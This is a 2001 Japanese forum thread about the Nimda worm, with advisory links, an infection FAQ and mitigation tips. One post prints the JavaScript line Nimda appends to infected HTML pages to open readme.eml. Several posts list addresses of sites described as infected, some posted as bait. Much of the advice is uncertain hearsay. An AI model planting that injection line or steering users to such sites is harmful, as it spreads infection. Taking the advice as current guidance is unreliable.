Nimda !! その産
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
NGNG0002名無しさん@お腹いっぱい。
NGNGhttp://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301
●前スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617
●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/
日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
●関連スレ
ニュース速報板「スーパー初心者のためのMSNウイルスすれ」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627
0003
NGNG「ウイルスに狙われるのはIIS浸透の代償」
http://slashdot.jp/article.pl?sid=01/09/21/1751221&mode=thread&threshold=
0004名無しさん@お腹いっぱい。
NGNG苦しい良いわけですな(藁
0005名無しさん@お腹いっぱい。
NGNGニュース速報板「スーパー初心者のためのMSNウイルスすれ2」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000909667
ニュース速報板「スーパー初心者のためのMSNウイルスすれ3」
http://news.2ch.net/test/read.cgi?bbs=news&key=1000945627
ニュース速報板「スーパー初心者のMSNウイルススレッド【最終板】」
http://news.2ch.net/test/read.cgi?bbs=news&key=1001009235
トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp
0006名無しさん@お腹いっぱい。
NGNGhttp://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
0007名無しさん@お腹いっぱい。
NGNGこの記事(ITプロにある元記事のこと)に関してはすごく憤りを感じます。
また、評価内にあるあの擁護記事もね!
なんて無責任な発言なんだろうって思いましたよ
0008名無しさん@お腹いっぱい。
NGNG┃ IE . ┃ ┃ JavaScript@readme.eml ..┃
┃(´д`)..┃←..┃┏━━━━━━━━━┓......┃
┃ マターリ..┃ ┃┃wavですが(゚Д゚)何か?┃......┃
┗━━━┛ ┃┃(((((((readme.exe)))))).┃......┃
.┃┗━━━━━━━━━┛......┃
.┗━━━━━━━━━━━━┛
IE
(´д`)<読み込んだHTMLのJavaScriptで、読込先がreadme.emlになってるけど...オカシイヨナァ
IE
(´д`)<まぁ、emlの関連付けはOEになってるから、OEに渡しとくか...
┏━━━━━━━━━━━━━━━━━━━┓
┃ OE ← readme.eml ← IE ...┃
┃(´д`)┏━━━━━━━━━┓ (´д`) ┃
┃ マターリ┃wavですが(゚Д゚)何か?┃ OEさーん . ┃
┃ ...┃(((((((readme.exe)))))).┃.....メールデスヨー┃
┃ ...┗━━━━━━━━━┛ ...┃
┗━━━━━━━━━━━━━━━━━━━┛
┏━━━━━━━━━━━━━━━━┓
┃ OE . .┏━━━━━━━━━┓ ┃
┃(´д`) ..┃wavですが(゚Д゚)何か?┃ ┃
┃シンヨウスルヨ.┃(((((((readme.exe)))))).┃....┃
┃ .┗━━━━━━━━━┛ ┃
┗━━━━━━━━━━━━━━━━┛
┏━━━━━━━━━━━━━━━━┓
┃ OE ...........┃
┃(;゚д゚) 本当はEXEダヨン(゚∀゚)アーヒャヒャ ┃
┃ダマサレタァ アヒャ゚∀゚)readme.exe(゚∀゚アヒャ ┃
┃ . ┃
┗━━━━━━━━━━━━━━━━┛
0009名無しさん@お腹いっぱい。
NGNG┃Windows ........┃
┃(゚∀゚) (゚∀゚)アーヒャヒャ (゚∀゚)アーヒャヒャ. .....┃
┃アーヒャヒャ......アヒャ゚∀゚)readme.eml(゚∀゚アヒャ┃
┃readme.eml readme.eml readme.eml....┃
┗━━━━━━━━━━━━━━━━┛
(゚∀゚)アーヒャヒャヒャ ゾウショクダヨーン
┃
━━━┳━マイクロソフトネットワーク、インターネット、ローカルファイルシステム、メール...━━━━╋━━━━
.....┃ ┃ (゚∀゚)ソーシン!アーヒャヒャ
(゚∀゚)アーヒャヒャ (゚∀゚)アーヒャヒャヒャ ┏━━━━━━━━━━━━━━━━━━━━━━┓
┏(´д`)HTML━┓┏(゚д゚)IIS━━━━━┓ ┃Address: 受信トレイに有るメールのメールアドレス宛て┃
┃ .......┃┃ ┃ ┃中身: readme.eml ┃
┃ .......┃┃ボクノサイトにオイデヨ!! ┃.┃(゚∀゚)アヒャヒャwaveダヨーンヒーヒヒヒ .┃
┃ (´д`) ....┃┃ (・∀・)カエレ!! ┃.┃(((((((((((((readme.exe))))))))))) .┃
┃ マターリ ..┃┃ ┃ ┗━━━━━━━━━━━━━━━━━━━━━━┛
┗(´д`)HTML━┛┗(゚д゚)IIS━━━━━┛
↓ ↓
┏(゚∀゚)HTML━┓ ┏(゚∀゚)IIS━━━━━┓
┃readme.eml .┃ ┃プレゼントダヨ!! ......┃
┃ (゚∀゚)アヒャ . ┃ ┃readme.eml ......┃
┃アーヒャヒャヒャ ┃ ┃(゚∀゚)ヨメ!!!!アーヒャヒャ!!..┃
┗(゚∀゚)HTML━┛ ┗(゚∀゚)IIS━━━━━┛
0010mam
NGNG0011名無しさん@お腹いっぱい。
NGNGスマソ、前スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100
の>>505みてくれm(_ _)m
これFAQにまとめる根性いまないです・・。
0012名無しさん@お腹いっぱい。
NGNG0013名無しさん@お腹いっぱい。
NGNGいやそうじゃなくて、
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100
の>>505みてくれm(_ _)m
タノム。
0014名無しさん@お腹いっぱい。
NGNG0015mam
NGNG今、見てきました。まだ不安定みたいですね!
あ〜こわいなぁ・・・。
0016950
NGNGそれじゃどうしたらいいんでしょう・・(泣)
いちおう駆除ツールで処理して、その後、確認のために最新のノートンでウィルスチェックしたら大丈夫だったんです。
でも、レジストリエディタを検索したら、例のreadme.emlやら.read.exeやら見つかりました・・
もう、わけわかりません・・
前述の処置をしててもだめなのですか?
レジストリのこいつら、削除しても意味ないですか?
0017(;´Д`)
NGNGMSはIE6でもOE6も一緒にインストールすればいいと言っているが
http://memo.st.ryukoku.ac.jp/archive/200109.month/1377.html
Win2kはSP2+IE6+OE6でもやばいらしい……。
鬱。
0018結論
NGNG0019>
NGNGIISは
SBSの管理ツールとか
MS ProxyServerとか、
Webサーバーをユーザが意識していなくても
起動を必要とする場合があり、そういうのも含めれば
実行されているIISは数多いと思われ。。。
まあ、本質的には必要のない場面でも、IISの使用を
ユーザに押し付けるMSの発想は納得いかん。。
仮にIISが健全だとしても、、重くなるだけ。。。。
0020向こうにも書いたけど
NGNG0021名無しさん@お腹いっぱい。
NGNG0022結論
NGNG0023名無しさん@お腹いっぱい。
NGNGの図は間違ってるってば
0024名無しさん@お腹いっぱい。
NGNGそう?8じゃないけど、わりといい線いってるんじゃない?
0025名無しさん@お腹いっぱい。
NGNG約8スレ程度になる見込みです。
0026名無しさん@お腹いっぱい。
NGNGこの中に含まれている枝リンク孫リンクのみなさんも含めて(-人-)
「 Nimda !! 」スレで偉大な実験や衝撃の体験を告白してくださったみなさんに感謝(-人-)
みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)
カッコ内は前スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=100
のスレ番号です。
理由の説明はありません。(理由の説明の誤りによる誤解を防ぐため)
現象のみを記録するよう努めました。
0027名無しさん@お腹いっぱい。
NGNG●ニムダはWin95/98系など一般のパソコンでは感染しないのですか?
します。
(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
0028名無しさん@お腹いっぱい。
NGNG(403)
IE6は限りなくグレー(´Д`)
貴重な人柱さんの体験
(292)
ファイルをIE上にドラッグしたらメディアプレイヤーが開いて、
”Windows Media player のエラー
オブジェクト名が見つかりませんでした。”
となった
(402)
http://memo.st.ryukoku.ac.jp/archive/200109.month/1302.html
のように勝手にreadme.exeを開く
(850)
レジストリにExolorerBars内のところにLoad.exeとかいわゆるNimda関連のファイル名が書き込まれた
(IE6W2K版)
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
:
:
MicrosoftR Internet Explorer 6 (最小構成時のみ)
#なお、本当に最小構成時のみなのかは疑惑視されています。
0029名無しさん@お腹いっぱい。
NGNG●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある?(688)
あります。
●フォルダの設定でWeb表示(.JPGを選択と左側に寒ネイルが表示されるような)で感染サイトの.lnkファイル(お気に入りのこと)を選択すると? (460)
(463)
感染可能ブラウザの場合、選択(開くではない)だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。
(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
(IEが未対応だったので)
補足:.htmlなどのファイルでも同様と思われる
0030名無しさん@お腹いっぱい。
NGNGあります。
(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル(キャッシュファイル)にふれてしまうと場合によっては感染する。
●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全?(701)
(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない(感染する)
【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】
0031名無しさん@お腹いっぱい。
NGNG0032名無しさん@お腹いっぱい。
NGNG前スレ見ろ
0033名無しさん@お腹いっぱい。
NGNGよく我慢しました。
0035名無しさん@お腹いっぱい。
NGNGサンキュ
また情報が出たら追加してくれる?
0036FAQer
NGNGがんばりますm(_ _)m
0037名無しさん@お腹いっぱい。
NGNGそのハンドルはなんと発音すればいいんだ?
0038
NGNG俺は>>36じゃないけどさ。
0039名無しさん@お腹いっぱい。
NGNG「チョコボール向井」でええんじゃない?
0040名無しさん@お腹いっぱい。
NGNGでどうだ。どっかのワクチンソフトみたいだが。
0041FAQer
NGNGワラタ
0043名無しさん@お腹いっぱい。
NGNG今感染している国内の鯖は火曜までこのままか。
アクセスも少ないからアポーンするユーザーも減るといいけど。
0044名無しさん@お腹いっぱい。
NGNG0045しよ〜しゃたん ◆JHEd0Il.
NGNGどの程度で「沈静化」と見ればいいんだろうなぁ・・・
>>44
よくわかってないので、とりあえずIE6早めておいた方が無難
0046(;´Д`)はぅ・・・
NGNG対策(「対」は、事前対策)
対・IE6はやめておけ →IE5.5SP2の人はそのまま、6にしてしまった人はそのままでOK?
(→どのバージョンにしても、ダイアログは出る。高バーは自動実行は防げる程度。
→キャンセル等を選択せず、そのままダイアログ・ウインドウを閉じる。)
対・エクスプローラ「Web表示」の設定にしない 。
対・Javaはオフにする。
対・WAVの関連をメディア・プレーヤーからはずす?(疑問)
対・ノートン先生等の最新パターンファイルを装備。
・下手な検索・削除はしない。→シングルクリックでも実行されてしまう。
→DOSからは消して問題なし?
対・OEとの関連を切るか、消してしまえばOK?(疑問)( しかし、将来的な解決にはならんだろ?)
・もし感染してたら、フォーマットして、クリーンインスト→IEバーの更新・パッチ当て・JAVA切り・WEB切り(・DLも切り?)→最新パターのアンチウイルスソフト入れる(→Winも?)
で防御に備えるしかない?
無力ですが、たたき台にしてください。
0047名無しさん@お腹いっぱい。
NGNG0048名無しさん@お腹いっぱい
NGNG最小インストールしか出来ないから。OE6は入れられない。
Windows 2000ではこれまでのIEと同様に,標準および完全インストールを実行できず,最小限のインストールになる。
IE6をインストールしたWindows 2000にはService Packを再導入してはならない。
IEがアンインストールできなくなるという。
いずれもWindows 2000が備えるWindowsファイル保護機能のため。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/
0049名無しさん@お腹いっぱい。
NGNGあ〜、感染させるのも飽きた
0050名無しさん@お腹いっぱい。
NGNG0051名無しさん@お腹いっぱい。
NGNG>最小インストールしか出来ないから。OE6は入れられない。
これはどっから出たデマなんですかねえ?
私、IE6のW2KインストールでOE6になりましたけど・・・
0052名無しさん@お腹いっぱい。
NGNG0053名無しさん@お腹いっぱい。
NGNG0054名無しさん@お腹いっぱい。
NGNG0055名無しさん@お腹いっぱい。
NGNGそのリンク先って、感染サイトだろ?
0056名無しさん@お腹いっぱい。
NGNG正解。ネスケで見ると窓が出る
0057
NGNG感染してないよ?
0058名無しさん@お腹いっぱい。
NGNGやれやれ、藁にもすがる思いでここに迷い込んでくる雛たちを苛めて楽しいのか?
0059名無しさん@お腹いっぱい。
NGNG最低なヤツ
0061
NGNG0062名無しさん@お腹いっぱい。
NGNGそうやって誘い込むなって
0063名無しさん@お腹いっぱい。
NGNGキミも感染したのか?悔しかったのは分かるが、やめろよ。
0064名無しさん@お腹いっぱい。
NGNGイッテヨシ
0065
NGNG感染してるhtmlを示しておくれ。
0066名無しさん@お腹いっぱい。
NGNG知っててそう言うこと言うな
0067名無しさん@お腹いっぱい。
NGNGおれは先生が警告出してくれる。
0068
NGNGクソだなM$。
0069極論だけど
NGNG0070
NGNG<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
0071名無しさん@お腹いっぱい。
NGNG氏ね
0072名無しさん@お腹いっぱい。
NGNG0073
NGNGマイクロソフトがIE6日本語版を提供開始,NT4と2000で異なる注意点
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20010919/3/
0074名無しさん@お腹いっぱい。
NGNGいや、おまえがくだらん感染リンクを貼って、誘い込もうとしてるのに横槍を入れてるだけだよん。
0075名無しさん@お腹いっぱい。
NGNG0076名無しさん@お腹いっぱい。
NGNG0077
NGNG感染サイトってなんだ?
0078名無しさん@お腹いっぱい。
NGNG出直してくるか
0079
NGNG0080うひょのふ
NGNG友達にニムダ対策教えてあげて、SP2とか当てさせたんだけど、
<数字の羅列>.eml ってファイルが21個HDん中から見つかったって
これってもうアウト?
0081
NGNG行かないでー (;;)
0082名無しさん@お腹いっぱい。
NGNG感染したサイトとして つー意味じゃねぇの?
008378
NGNGそれじゃあ、お前逝ってくれよ
0084名無しさん@お腹いっぱい。
NGNG暗喩と思われ。。
0085名無しさん@お腹いっぱい。
NGNG文字列で検索かけたんじゃねーのか?
0086
NGNGemlはメールファイル。
20ぐらいあっても普通。
1)readme.exe と root.exeの検索
2)ファイル中の文字列検索でreadme.eml探す。
3)ディスク中の.htmファイルの最後に>>70が付いてないかチェック。
0087名無しさん@お腹いっぱい。
NGNGは感染してなかったよ
IE6のProgram Files\Internet Explorer\Readme.txtからの抜粋ね
Windows 2000 へのインストール
-----------------------------
現在、Windows 2000で標準インストールおよび完全インストールを実行することはできません。
Internet Explorer 6はシステムに既定のファイル セットをインストールします。
これらは、Internet Explorer 6のWeb ブラウザおよびスクリプティングのサポートが含まれています。
0088うひょのふ
NGNGいや、ちゃんとファイル名検索させたんですよ
>>86
友達がすんごく、いいかげんな奴なんで
メールファイルを自分で保存したかどうかなんて憶えてないんですよ
だからといって自分で開かせるのも怖いし・・・
readme.exeは一緒に検索させましたが、見つからなかったようです。
2)、3)に関してはこれから調べさせます。 感謝!!
0089名無しさん@お腹いっぱい。
NGNG0090
NGNG0091
NGNGhttp://www.trendmicro.co.jp/hcall/scan.htm
0092名無しさん@お腹いっぱい。
NGNGマジ?ほっとしたよ
0093名無しさん@お腹いっぱい。
NGNG既出だったらスマソ
0094FAQer
NGNG0095名無しさん@お腹いっぱい。
NGNGいまさら感染するなよ、と言いたい。
ttp://www.ses-corp.co.jp/products/sst200/main.html
ttp://www.kyowa-kk.co.jp/
0096名無しさん@お腹いっぱい。
NGNGこういうのがないからレベル下がるんだな・・。
ttp://210.12.193.252/
ttp://210.110.148.141/
ttp://210.12.157.160/
ttp://210.221.55.61/
ttp://210.65.38.221/
ttp://www2u.biglobe.ne.jp/~hole/
できれば前スレ見て自分でフォローしてくれ。
いちいち感染サイトが今も感染しているか確認するのもめんどくさい・・。
0097名無しさん@お腹いっぱい。
NGNG0098名無しさん@お腹いっぱい。
NGNGスマソ、前スレでも見たが分かるように説明してくれ。
0099名無しさん@お腹いっぱい。
NGNGDOTE(ANTIDOTE
をキーワードでgoogleくらいしたんだろうな?
0100名無し
NGNG0101>
NGNGF通 なんかあったの?
0102名無しさん@お腹いっぱい
NGNGいまから・・Win2000+IE6でにアクセスしてみます
ちなみにIISはとめてます
Win2000→SP1→SP2→IE6とてれました
アンチウイルスソフトは入っていません
0103名無しさん@お腹いっぱい。
NGNG>>96の最後の行はただのQ2じゃないの?
ActiveXをインストールさせようとするけど
これをウィルスっていったら、M$自体がウィルスだな。
0104-
NGNGhttp://members.tripod.co.jp/bingo852/
0105名無しさん@お腹いっぱい。
NGNG0106
NGNGIEのレベルを中にしてjavaを有効にして
知らないHPに行くときや検索かけるときはレベル高で、っていうのではダメかな?
0107106
NGNG0108>
NGNGあるな。
管理者きづけよ。。。
0110名無しさん@お腹いっぱい。
NGNG0111名無しさん@お腹いっぱい。
NGNGあ、そう。
0112名無しさん@お腹いっぱい。
NGNG0113名無しさん@お腹いっぱい。
NGNG情報ならここにあるよ
http://210.12.193.252/
0115
NGNGどんなプレー?
0116名無しさん@お腹いっぱい。
NGNG安心した
0117名無しさん@お腹いっぱい。
NGNG0118名無しさん@お腹いっぱい。
NGNG0119名無しさん@お腹いっぱい。
NGNGhttp://210.110.148.141/
http://210.12.157.160/
http://210.221.55.61/
http://210.65.38.221/
ここってなに?
0120>
NGNG感染源サイトかも知れないし
得体の知れないリンクはとりあえず無視するのが賢明。
0121名無しさん@お腹いっぱい。
NGNGそこ、なんか音楽がなるよ
0122名無しさん@お腹いっぱい。
NGNG0123>
NGNGフィルタしてしまうという措置やってくれないかね。。。
0124名無しさん@お腹いっぱい。
NGNGプロバイダの関知するところではない。
お前ら一般ユーザーの尻ぬぐいをプロバイダがするわけがない
0125名無しさん@お腹いっぱい。
NGNGなんで人任せにする?
0126100
NGNG今度かう予定
0127名無しさん
NGNGインターリンクがコードレッドバスターを設置したが、評判が
悪くて5日で撤去してた。
詳しくはプロバイダー板のインターリンクスレ参照。
『コードレッドバスター』設置について 2001.08.15
http://www.interlink.or.jp/notification/backno/2001/info015.html
0128>
NGNG世の中にちゃんと管理されてないマシンで
なおかつ繋がっているものが
これだけ増えてくると、
(
CodeRedやられたまま未だに放置されてるサーバとか
結構あるしょ
)
そういう対応(上流でのフィルタとか)
も必要じゃないかなという気がする。
自営ドメイン自前サーバが以前よりダイブお手軽になっちゃった
わけだから、そいうった”大衆化”に合わせる必要がでてるんじゃ
ないかなあと。。。
0129真一郎
NGNG0130
NGNG0131名無しさん@お腹いっぱい。
NGNGANTIDOTE http://www.vintage-solutions.com/indexie4-jpn.htmlANTIDOTE Personal 2000
2000/12/01 販売開始
ANTIDOTE for PC Viruses Personal 2000 は、好評の簡易型ウイルス検索プログラムを発展させた新しいタイプのウイルス対策ソフトウェアです。
本製品は簡易型同様にインストーラなしにシステム導入するため、システムへの組込みは極めて簡単です。また現在ご使用のウイルス対策製品に競合することなく動作するため、二次的なウイルス対策製品としてもご使用頂けます。
0132102
NGNGやりなおします
0133名無しさん@お腹いっぱい。
NGNGISPの端くれとしての意見。
HTTPでGETしてる内容の監視をすることになってしまいますからね。
ウィルスもらうのも出すのもお客さんの自由であって、それを
ウィルスだからと阻害するのは、ある意味通信内容の検閲に
該当するという意見もありますから。
やってるとこもあるようですが、個人的には疑問です。
0134102
NGNGメディアプレーヤーは起動したけど・・終了と詳細しかえらべなかった
いったん・・IE6さくじょしていれなおしたんじゃたんじゃだめなのかな・・
0135>133
NGNGサービスはあっていいかも知れない。。
でも、、CodeRedにやられたまま、放置してるような人って
こんなサービスあっても使わんだろうな。。。。
0136133
NGNGユーザオプションてことであれば同感。
ユーザの要求と正当な対価、および利益あたりがバランスすれば
ISPにできることってかなりあるんだけどね。
ほとぼりが冷めたころにきっとまた増えるよ<感染サーバ
0137
NGNG透過プロシキ使っても嫌がるユーザーも多いし。
HTTP/GETの内容見てのフィルタじゃ誤動作もある程度考えなければならない。例-インターリンクのコードレッドバスター
80番ポートはインターネットで一番かなめのサービスだから難しいな。
ファイアーウォール設置していても感染するワームをISPのサービスに期待するのは酷でしょう。
0138
NGNGなんでやらないの?
法的問題は無いだろ?
留守にしている他人の家で小火(ぼや)があったら、上がりこんで消してもいいだろうに。
0139
NGNGそれはCodeRedの時さんざん議論されたが、法的に問題がある。
判例がないから、裁判所がどう判断するかは未知数だが、
緊急避難には当たらない可能性が高い。
よかれと思ってやって捕まっちゃったら損だ。
0140ど素人のおぢさん
NGNGその夜のテレビのニュースで流れたNimdaの事が気になり、ちょうど良い機会に
思えましたので、ずっとほかしておいたウイルスバスターのウイルス定義をアッ
プデートしようとインターネットに接続したのです。
そう、あれは夜8時40分過ぎのことだったと思います。
Outlook2000を立ち上げてからIE(5.5sp1)を起動。いつものVAIOホームページが
表示されると、ウイルスバスターのコンソールからウイルス定義の更新を行い、
最新データをダウンロードいたしました。
さて、せっかく手に入った最新データ、早速「マイコンピュータのスキャン」を
実行しましたが、その間、並行してメールもダウンロードし、いくつかのサイト
を閲覧しておりましたところ・・・なんとNimda感染のメッセージが!!
ファイルはc:\Admin.dll(2001/09/21 20:49)および、d:\Admin.dllの二つ。
これって、この日感染したって事ですかね?運がいいのやら悪いのやら。
0141>
NGNG思ったら、
そのドメイン、DNS参照でmxレコードがでてこない。
0142名無しさん@お腹いっぱい。
NGNGニムダ特需が起きてると思われ。
0143
NGNGつーかTVでNimdaの事知ってたのに
ネットサーフィン&メールって・・・?
0144名無しさん@お腹いっぱい。
NGNG要するに意識の差でしょ?普段から、この板来ているような人は
元々意識が高いから、あまり感染しない。
感染しても騒がず、対処も知っているからばら撒かない。
一方、普段から意識の低い人は・・・・(以下、略)。
0145名無しさん@お腹いっぱい。
NGNGよ〜ん。
このスレの意義は勇敢な人柱にあり。
0146>143
NGNGそういう人達もドメイン自営、自前サーバを簡単にたてる時代
になったことが問題ですね。
大衆化しちゃった以上、個人の意識レベルではなく
社会の仕掛けとして対策が必要とも思うのです。
0147名無しさん@お腹いっぱい。
NGNG0148名無しさん@お腹いっぱい。
NGNGhttp://210.220.111.217/
http://210.110.148.141/
http://210.12.157.160/
http://210.12.193.252/
http://210.65.38.221/
http://210.221.55.61/
このアドレス全部が既読になってる漏れは勇者ですか?
0150名無しさん@お腹いっぱい。
NGNG全て210.***.***.***だね。
0151名無しさん@お腹いっぱい。
NGNGアクチブエックスとジャバスクリプトをオフにして
(クッキーだけはオンでした。ヤフオクができなくなるので)
ゾーンアラームをつけていたら、ウィルスを喰らわないで今の所すんでいました。
私の英語力は厨房並なので、ゾーンアラームがYESかNOか聞いてきたときは
ほとんど問答無用でNOにしてたんですが、それがよかったのかなぁ?
2chのウィルスバスターについての過去ログを読んで
ウィルスバスターも入れ直して、オンライン登録のところを「いいえ」にして
海外のトレンドマイクロのサイトからダウンロードしてくる方式に
変えました。(ウィルスバスター2000までの方式を持っている2001に適用)
あ、プリインストール版のマカフィーウィルススキャンを使ってる方へ。
それは不備だらけです。
私は今回の「ニムダウィルス」騒動がおきる1年前に、
マカフィーのアンチウィルスソフトを更新料払って使い続けようと思っていたのですが
2chのスレッドに、プリインストール版のマカフィーは
「アイラブユーウィルスに対応してないので、製品版を買ってください」
(更新料払ってもダメ)ということがサイトに書いてあったので、
「ふざけんな!!!」と思ってウィルスバスターを買ったので…。
(ノートンのほうが評判いいみたいなんですが、ウィルスバスターのほうが
値段が安かったので、こっちを買いました)
0152名無しさん@お腹いっぱい。
NGNG信頼できるニュースソースとして、2ちゃんねるがありますか。
そうですか…。
0153名無しさん@お腹いっぱい。
NGNGCodeRedとNimdaに混ざってこんなのが1分ごとに16発連続であったけど…
何これ?
CodeRedの亜種?
Nimdaっぽくはなさげだけど…
0154名無しさん@お腹いっぱい。
NGNG信頼できるかどうかというと一寸考えるが、情報はすごく早いので
重要な情報源の1つではあるな。
裏を取らないと信用できる情報にならないことだけが難点。
0156dh046-bee.uel.ac.uk
NGNG0157名無しさん@お腹いっぱい。
NGNG調べたらOCNにIPを持っていたので、
OCNに対応をお願いしたのが先週の木曜日。
・・・今日ログを見てみたら、1000越えてるんですが?
相変わらずどころか、アクセスが激しくなってるんですか?
0158名無しさん@お腹いっぱい。
NGNGttp://www1.sphere.ne.jp/noone/
0159名無しさん@お腹いっぱい。
NGNGhttp://www.cameraguild.co.jp/officeheliar/moo/
0160名無しさん@お腹いっぱい。
NGNGだからそこApacheだって。
恐らく便乗犯
0161名無しさん@お腹いっぱい。
NGNGhttp://space.sphere.ne.jp/rental/
0162名無しさん@お腹いっぱい。
NGNG---
274 名前: 本日の投稿:01/09/23 11:22
2,3ヶ月前の事。
マカヒのアンインストールについてソースネクストにサポートを依頼したところ、下の回答だった。
・・・ウイルスソフトによって、OSから再インストを余儀なくされた。
ウイルスと同じくらいタチが悪い、と思う。
****************************************************
この度は弊社ソフトをご利用いただき、ありがとうございます。
ご質問の件ですが、ウイルススキャン単体の削除ですが、
Windows2000環境では、レジストリの編集を行うことができない為、
削除することは難しいかと思います。
リカバリは、システムの再構築を意味致しますので、ハードディスクドライブ
のフォーマットから、OSの再インストールを行うことになります。
現状では問題を解決することが難しいこと、また、自作DOS/V機に
関しては、動作対象外となる為、返品についてはお受け致しますので、
ご検討いただけないでしょうか。
ご不明な点がございましたら、お手数ですが、再度ご連絡ください。
今後とも、ソースネクストをよろしくお願いします。
0163名無しさん@お腹いっぱい。
NGNGなんじゃそりゃ!?嫌がらせとしか思えん。
ちなみに元スレどこ?
0164名無しさん@お腹いっぱい。
NGNGhttp://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100
ここです。
ちなみに私は質問はしませんでしたが、この状態になりました。
ウイルスバスターは、マカフィーもウイルスと見なしてアンインストールを要求しますが、この状態になってしまうと、ウイルスバスターはお手上げになってしまいます。
0165名無しさん@お腹いっぱい。
NGNGIISを使っていて感染してApacheに変えたと思われ。
つーか、Apacheだってメール感染とかしてればニムダの場合ウイルスディスペンサーになるでは?
0166名無しさん@お腹いっぱい。
NGNGWindows2000でApacheだったら、redeme.exe実行してもウイルス配布しないの?
0167名無しさん@お腹いっぱい。
NGNG対象OSは増えてるんだね。
IE4.0は安全かなと思いこんで放置してなくて良かったよ。
0168名無しさん@お腹いっぱい。
NGNGソラリスなんだよなぁ。その前はIISだったのかなぁ。
あと、昨日だったかダイアルアップだと思うけど、CodeRedがきてて
netcraftで調べたらIISじゃなくてBJDだったんだよな。
たまたまIISのときアタックしてその後停止でBJDかなぁ。
M$のいうように、停止中は活動しないのかインストールしてるだけ
でダメなのかよくわからない。
0169167
NGNG0170名無しさん@お腹いっぱい。
NGNGhttp://ton.2ch.net/test/read.cgi?bbs=sec&key=994010282&ls=100
294 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/23 22:15
>288
バーテックスリンク社のアンチドートでしょ?
バスターやノートンと同じく市販されてるよ。
使ってるけど、アップデートが結構メンドイ。
0171168
NGNGここって、最近変えたのなら残るよねぇ。
元々Apacheとソラリスだと思うのだが違うのか?
0172名無しさん@お腹いっぱい。
NGNG前スレにLinuxであっても、Web公開してるフォルダをWinと共有してたら、htmlに感染JavaScript埋め込まれて、redeme.eml置いて行かれた、ってな趣旨の書き込みがあったぞ。
0173名無しさん@お腹いっぱい。
NGNGすまん、「Web公開してる」は埋め込まれとは関係ない。
この状態でWeb公開してると、Linuxでもニムダ供給サイトになるのでは、と。
0174名無しさん@お腹いっぱい。
NGNG>>451
0175名無しさん@お腹いっぱい。
NGNG>>456
0176名無しさん@お腹いっぱい。
NGNGユーザーが感染マシンでhtml編集していて、フォルダの中身丸ごとアプしてたらどうよ。
0177名無しさん@お腹いっぱい。
NGNG現実問題として、ある程度の規模のWebサイトを公開している企業などで
は、当然ながらファイア・ウォールを立てて、DMZセグメントのひとつを外
部用として、公開用Webサーバを置き、内部と外部を分けてセキュリティ
確保を行っている。
で、この公開用Webサーバの更新方法はいくつかあるけど、内部用DMZ
セグメントにバックアップ兼用サーバを置いて、ミラーリングする方法や、
専用のファイル共有サーバを置いてコンテンツを置く方法など、いつかの
やり方がある。
いずれにせよ、大規模Webサイトをメンテナンスするには、分業体制でコ
ンテンツを更新しているが、コンテンツの作成・更新作業は、Windowsクラ
イアント・マシンで行われ、動作確認を行った上で、ファイル転送される。
この時に、Webコンテンツのファイル転送を受ける中間サーバがWindows
機とファイル共有しているシステムだったり、転送が差分について無条件
で行われるシステムだと、nimdaによってJAVAのスクリプトが書き込まれ
たhtmlファイルとreadme.emlファイルが公開用Webサーバに送り込まれて
しまう。
これは、公開用のWebサーバのソフトがIISでなくても、またプラットフォー
ムがUNIX系であっても発生する事態である。
ということで、トータルのWebシステム、コンテンツ管理システムがどうなっ
ているかで、サーバがUNIX&Apacheであってもnimdaの感染源サイトにな
りうるということ。
0178貧乏人
NGNG入れてみた。ウィルスバスター体験版。
常駐してると重そうからさっさと常駐切ったんだけど、
HPにアクセスするたびにロゴが出てウザイ。なんとかならんの?
というか常駐切ってるのにいちいちチェックしてくれるのか
0179あ
NGNG↑これなら大丈夫
0180金持ち
NGNG重く感じないマシンを使え!(w
0181名無しさん@お腹いっぱい。
NGNGウィルスバスターのHPチェック機能は重いのにヘッポコだそうだから
